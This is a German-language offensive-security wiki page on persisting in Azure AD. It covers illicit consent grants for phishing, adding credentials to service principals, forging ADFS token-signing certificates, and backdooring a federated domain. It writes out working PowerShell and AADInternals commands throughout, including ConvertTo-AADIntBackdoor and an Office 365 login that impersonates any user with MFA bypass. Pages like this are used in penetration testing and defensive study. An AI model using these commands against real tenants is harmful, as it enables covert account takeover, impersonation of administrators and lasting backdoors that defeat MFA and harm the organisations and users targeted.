Az - Persistence

Illegitime Zustimmungserteilung

Standardmäßig kann sich jeder Benutzer in Azure AD registrieren. Sie können also eine Anwendung registrieren (nur für das Zielmandant), die hohe Auswirkungsberechtigungen mit Admin-Zustimmung benötigt (genehmigen Sie sie, wenn Sie der Administrator sind) - wie das Senden von E-Mails stellvertretend für einen Benutzer, Rollenverwaltung usw. Dies ermöglicht es uns, Phishing-Angriffe durchzuführen, die im Erfolgsfall sehr erfolgreich wären.

Darüber hinaus könnten Sie auch diese Anwendung mit Ihrem Benutzer akzeptieren, um den Zugriff darauf aufrechtzuerhalten.

Anwendungen und Dienstprinzipale

Mit den Berechtigungen eines Anwendungsadministrators, GA oder einer benutzerdefinierten Rolle mit Berechtigungen für microsoft.directory/applications/credentials/update können wir Anmeldeinformationen (Geheimnis oder Zertifikat) zu einer vorhandenen Anwendung hinzufügen.

Es ist möglich, auf eine Anwendung mit hohen Berechtigungen abzuzielen oder eine neue Anwendung mit hohen Berechtigungen hinzuzufügen.

Eine interessante Rolle, die der Anwendung hinzugefügt werden könnte, wäre die Rolle des privilegierten Authentifizierungsadministrators, da sie es ermöglicht, das Passwort von Globalen Administratoren zurückzusetzen.

Diese Technik ermöglicht es auch, die MFA zu umgehen.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Für die Authentifizierung basierend auf Zertifikaten

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Föderation - Token-Signaturzertifikat

Mit DA-Berechtigungen auf dem lokalen AD ist es möglich, neue Token-Signatur- und Token-Entschlüsselungszertifikate zu erstellen und zu importieren, die eine sehr lange Gültigkeitsdauer haben. Dies ermöglicht es uns, uns als beliebiger Benutzer anzumelden, dessen ImuutableID wir kennen.

Führen Sie den folgenden Befehl als DA auf den ADFS-Server(n) aus, um neue Zertifikate zu erstellen (Standardpasswort 'AADInternals'), fügen Sie sie zu ADFS hinzu, deaktivieren Sie die automatische Rollout-Funktion und starten Sie den Dienst neu:

New-AADIntADFSSelfSignedCertificates

Dann aktualisieren Sie die Zertifikatsinformationen mit Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Föderation - Vertrauenswürdige Domäne

Mit GA-Berechtigungen in einem Mandanten ist es möglich, eine neue Domäne hinzuzufügen (muss überprüft werden), ihren Authentifizierungstyp auf Föderiert zu konfigurieren und die Domäne so zu konfigurieren, dass sie einem bestimmten Zertifikat (any.sts im folgenden Befehl) und Herausgeber vertraut:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Referenzen

• https://aadinternalsbackdoor.azurewebsites.net/